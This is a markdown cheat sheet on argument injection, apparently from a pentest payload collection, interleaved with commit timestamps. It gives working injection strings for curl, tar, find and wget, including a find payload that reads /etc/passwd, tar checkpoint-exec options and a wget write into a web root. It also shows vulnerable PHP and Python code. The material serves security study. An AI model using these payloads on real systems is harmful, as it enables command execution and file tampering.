2022-10-06 14:56:44 +00:00
# Argument Injection
2024-09-16 16:05:54 +00:00
2022-10-06 14:56:44 +00:00
Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping.
It can happen in different situations, where you can only inject arguments to a command:
- Improper sanitization (regex)
- Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen)
- Bash expansion (ex: *)
2024-09-16 16:05:54 +00:00
In the following example, a python script takes the inputs from the command line to generate a ```curl``` command:*
2022-10-06 15:55:16 +00:00
```py
2022-10-06 14:56:44 +00:00
from shlex import quote,split
import sys
import subprocess
if __name__ =="__main__":
command = ['curl']
command = command + split(sys.argv[1])
print(command)
r = subprocess.Popen(command)
```
2024-09-16 16:05:54 +00:00
2022-10-06 14:56:44 +00:00
It is possible for an attacker to pass several words to abuse options from ```curl``` command
2024-09-16 16:05:54 +00:00
2022-10-06 15:55:16 +00:00
```ps1
2022-10-06 14:56:44 +00:00
python python_rce.py "https://www.google.fr -o test.py"
```
2024-09-16 16:05:54 +00:00
We can see by printing the command that all the parameters are split allowing to inject an argument that will save the response in an arbitrary file.
2022-10-06 15:55:16 +00:00
```ps1
2022-10-06 14:56:44 +00:00
['curl', 'https://www.google.fr', '-o', 'test.py']
```
2024-09-16 16:05:54 +00:00
2022-10-06 14:56:44 +00:00
## Summary
2022-10-06 15:55:16 +00:00
* [List of exposed commands ](#list-of-exposed-commands )
2022-10-06 14:56:44 +00:00
* [CURL ](#CURL )
2022-10-11 15:29:53 +00:00
* [TAR ](#TAR )
2022-10-11 16:49:17 +00:00
* [FIND ](#FIND )
2022-10-06 14:56:44 +00:00
* [WGET ](#WGET )
* [References ](#references )
## List of exposed commands
### CURL
2024-09-16 16:05:54 +00:00
2022-10-06 14:56:44 +00:00
It is possible to abuse ```curl``` through the following options:
2022-10-06 15:55:16 +00:00
```ps1
2022-10-06 14:56:44 +00:00
-o, --output < file > Write to file instead of stdout
-O, --remote-name Write output to a file named as the remote file
```
In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence.
### TAR
2024-09-16 16:05:54 +00:00
2022-10-06 14:56:44 +00:00
For the ```tar``` command it is possible to inject arbitrary arguments in different commands.
Argument injection can happen into the '''extract''' command:
2024-09-16 16:05:54 +00:00
2022-10-06 15:55:16 +00:00
```ps1
2022-10-06 14:56:44 +00:00
--to-command < command >
--checkpoint=1 --checkpoint-action=exec=< command >
-T < file > or --files-from < file >
```
Or in the '''create''' command:
2024-09-16 16:05:54 +00:00
2022-10-06 15:55:16 +00:00
```ps1
2022-10-06 14:56:44 +00:00
-I=< program > or -I < program >
--use-compres-program=< program >
```
2024-09-16 16:05:54 +00:00
2022-10-06 14:56:44 +00:00
There are also short options to work without spaces:
2024-09-16 16:05:54 +00:00
2022-10-06 15:55:16 +00:00
```ps1
2022-10-06 14:56:44 +00:00
-T< file >
-I"/path/to/exec"
```
### FIND
2024-09-16 16:05:54 +00:00
2022-10-06 14:56:44 +00:00
Find some_file inside /tmp directory.
2024-09-16 16:05:54 +00:00
2022-10-06 15:55:16 +00:00
```php
2022-10-06 14:56:44 +00:00
$file = "some_file";
system("find /tmp -iname ".escapeshellcmd($file));
```
Print /etc/passwd content.
2024-09-16 16:05:54 +00:00
2022-10-06 15:55:16 +00:00
```php
2022-10-06 14:56:44 +00:00
$file = "sth -or -exec cat /etc/passwd ; -quit";
system("find /tmp -iname ".escapeshellcmd($file));
```
2022-10-11 15:29:53 +00:00
### WGET
2024-09-16 16:05:54 +00:00
2022-10-11 15:29:53 +00:00
Example of vulnerable code
2024-09-16 16:05:54 +00:00
2022-10-11 15:29:53 +00:00
```php
system(escapeshellcmd('wget '.$url));
```
2024-09-16 16:05:54 +00:00
2022-10-11 15:29:53 +00:00
Arbitrary file write
2024-09-16 16:05:54 +00:00
2022-10-11 15:29:53 +00:00
```php
$url = '--directory-prefix=/var/www/html http://example.com/example.php';
```
2022-10-06 14:56:44 +00:00
## References
- [staaldraad - Etienne Stalmans, November 24, 2019 ](https://staaldraad.github.io/post/2019-11-24-argument-injection/ )
2022-10-06 15:55:16 +00:00
- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic, 06/25/2014 ](https://www.exploit-db.com/papers/33930 )
- [TL;DR: How exploit/bypass/use PHP escapeshellarg/escapeshellcmd functions - kacperszurek, Apr 25, 2018 ](https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md )